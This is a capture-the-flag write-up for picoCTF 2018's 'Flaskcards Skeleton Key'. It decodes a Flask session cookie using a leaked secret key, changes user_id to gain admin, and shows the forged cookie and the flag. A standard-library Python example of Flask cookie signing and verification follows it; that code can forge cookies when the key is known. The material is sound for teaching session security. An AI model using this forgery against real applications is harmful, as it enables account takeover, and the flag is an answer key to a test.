Tags: flask web 

Problem Statement (600 points):

Nice! You found out they were sending the Secret_key: a7a8342f9b41fcb062b13dd1167785f8. Now, can you find a way to log in as admin? http://2018shell2.picoctf.com:53999 (link).

Tags : flask session cookie decode and encode

Solution :

This one redirects to the same website as the previous Flask question, Flaskcards, but here the vulnerability in the create card feature has been removed. In the question we were given a secret key. I clicked the admin button but it showed "you are not admin". Then I read about the Flask secret key and found that it is used to sign the session cookie. So I checked the session cookie. It was the following:

.eJwlT0tqQzEMvIvXWUiWLUu5zEO2JBoCLbyXrErvXpcyq2E-zHyXI8-4Psr9db7jVo6Hl3uR5dnR6szlHO6olgszFukkbVxTW5hxB_DNwbpOFUkKHEgEPah5AO8SqDBbnTUUe8qoqOzTBDjqhm1p1ZVBg7wpmNpoy8qtrOvM4_X1jM-9JzEkw2ivmQJEvF2sY2xGU7WpmEviX-59xfl_gsvPLzCJP70.DqM_4A.iqFjQnY8fW8svj0UMnST-5uQJm8

I decoded it online using the Flask session cookie decoder (https://www.kirsle.net/wizards/flask-session.cgi) and the decoded part appeared as:

{
"_fresh": true,
"_id": "8cdf51a2bfcd6edd19afc1fec39b39462f94eaa6500d3940a59b988f3e1713305e34de06f51020b42b2e915f872196dba806e2e2ea42bc2cfe373d490a9a74ca",
"csrf_token": "f1e8fea3cd6b80336a7469776b83b99498ad8f1a",
"user_id": "6"
}

So to become admin I have to change the user_id. For admin the user_id should be either 0 or 1.
I changed the user_id to "1" using Python code (click here for code) and the encoded cookie was as below:

.eJwlT0sKQjEMvEvXLpKmn8TLPNImQREU3tOVeHcrMqthPsy80xa7H5d0fu4vP6XtaumceFpU1DxiWnMzFI2J4ZNkkJSWQ4qrtgpgi4NWGcIc5NiRCKpTMYe2SiDDKHlkF6zBPaM0G8rQPC_okmae4dTJioCK9jI1ndI89tiej5vf155A53CltWYwELXlatL7YjREirAaB_5yr8P3_wlMny8wej-4.DqNCDg.QMUO2oagfXVHopREu5DsIYt4c2w

I replaced the value of the session cookie in the browser and clicked the admin tab again. I was awarded with the flag:

Your flag is: picoCTF{1_id_to_rule_them_all_92303c39}
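The security point behind this challenge is that a Flask session cookie is signed, not encrypted: the data half is just (optionally zlib-compressed) base64 JSON that anyone holding the cookie can read without the key, and the only thing stopping a client from rewriting it is the HMAC signature made with SECRET_KEY. Once that key leaks, the server's verification step can no longer distinguish a forged cookie from a genuine one, and the only remedy is to rotate the key (which invalidates every cookie issued under the old one). The following is an added example, not code from the writeup or the challenge: a standard-library re-implementation of the server-side check Flask performs on every request. It assumes Flask's default scheme (itsdangerous URLSafeTimedSerializer with salt "cookie-session", HMAC-SHA1, and sha1-concat key derivation); the secret key and session contents used in the tests are constructed for the demo.

```python
import base64
import hashlib
import hmac
import json
import time
import zlib
from typing import Optional

# Constructed demo key for this example; not the key from the challenge.
DEMO_SECRET_KEY = b"constructed-demo-secret-key"
SALT = b"cookie-session"   # Flask's default salt for the session cookie
MAX_AGE = 31 * 24 * 3600   # Flask's default PERMANENT_SESSION_LIFETIME in seconds


def _b64encode(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode("ascii")


def _b64decode(text: str) -> bytes:
    # itsdangerous strips '=' padding; restore it before decoding
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def decode_payload(cookie: str) -> dict:
    """Read the data part of a Flask session cookie.
    No key is involved: the cookie is signed, not encrypted."""
    compressed = cookie.startswith(".")      # leading '.' marks zlib-compressed JSON
    payload = (cookie[1:] if compressed else cookie).split(".")[0]
    raw = _b64decode(payload)
    if compressed:
        raw = zlib.decompress(raw)
    return json.loads(raw)


def _derive_key(secret_key: bytes) -> bytes:
    # itsdangerous 'django-concat' derivation: sha1(salt + "signer" + secret_key)
    return hashlib.sha1(SALT + b"signer" + secret_key).digest()


def _signature(secret_key: bytes, signed_value: bytes) -> bytes:
    return hmac.new(_derive_key(secret_key), signed_value, hashlib.sha1).digest()


def make_cookie(data: dict, secret_key: bytes, timestamp: Optional[int] = None) -> str:
    """Serialize and sign session data the way the server issues it: payload.timestamp.signature."""
    raw = json.dumps(data, separators=(",", ":"), sort_keys=True).encode()
    compressed = zlib.compress(raw)
    if len(compressed) < len(raw) - 1:       # compress only when it actually saves space
        payload = "." + _b64encode(compressed)
    else:
        payload = _b64encode(raw)
    ts = int(time.time()) if timestamp is None else timestamp
    ts_b64 = _b64encode(ts.to_bytes((ts.bit_length() + 7) // 8 or 1, "big"))
    signed_value = f"{payload}.{ts_b64}".encode()
    return f"{payload}.{ts_b64}.{_b64encode(_signature(secret_key, signed_value))}"


def verify_cookie(cookie: str, secret_key: bytes, now: Optional[int] = None) -> Optional[dict]:
    """Server-side check: return the session data only if the signature was made with
    secret_key and the cookie is not older than MAX_AGE; otherwise return None."""
    try:
        payload, ts_b64, sig_b64 = cookie.rsplit(".", 2)
        signed_value = f"{payload}.{ts_b64}".encode()
        if not hmac.compare_digest(_signature(secret_key, signed_value), _b64decode(sig_b64)):
            return None                      # payload altered, or signed with a different key
        issued = int.from_bytes(_b64decode(ts_b64), "big")
        current = int(time.time()) if now is None else now
        if current - issued > MAX_AGE:
            return None                      # expired
        return decode_payload(cookie)
    except (ValueError, zlib.error, json.JSONDecodeError):
        return None                          # malformed cookie


if __name__ == "__main__":
    # The cookie from the writeup above: readable without any key.
    PAGE_COOKIE = (".eJwlT0tqQzEMvIvXWUiWLUu5zEO2JBoCLbyXrErvXpcyq2E-zHyXI8-4Psr9db7jVo6Hl3uR5dnR6szl"
                   "HO6olgszFukkbVxTW5hxB_DNwbpOFUkKHEgEPah5AO8SqDBbnTUUe8qoqOzTBDjqhm1p1ZVBg7wpmNpo"
                   "y8qtrOvM4_X1jM-9JzEkw2ivmQJEvF2sY2xGU7WpmEviX-59xfl_gsvPLzCJP70.DqM_4A."
                   "iqFjQnY8fW8svj0UMnST-5uQJm8")
    print("payload readable without key:", decode_payload(PAGE_COOKIE))
    demo = make_cookie({"_fresh": True, "user_id": "6"}, DEMO_SECRET_KEY)
    print("verifies with issuing key:", verify_cookie(demo, DEMO_SECRET_KEY) is not None)
    print("verifies after key rotation:", verify_cookie(demo, b"rotated-key") is not None)
```

The two things to take from the example are that `decode_payload` never touches the key (so nothing placed in a Flask session is confidential), and that `verify_cookie` has no way to flag a cookie signed with the correct key, however it was produced; integrity rests entirely on SECRET_KEY staying secret, so a leaked key should be rotated immediately, and a session store kept server-side is the alternative when cookie contents must not be readable.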

Original writeup (https://github.com/d4rkvaibhav/PICOCTF-2018/tree/master/WEB_EXPLOITATION/Flaskcards%20Skeleton%20Key).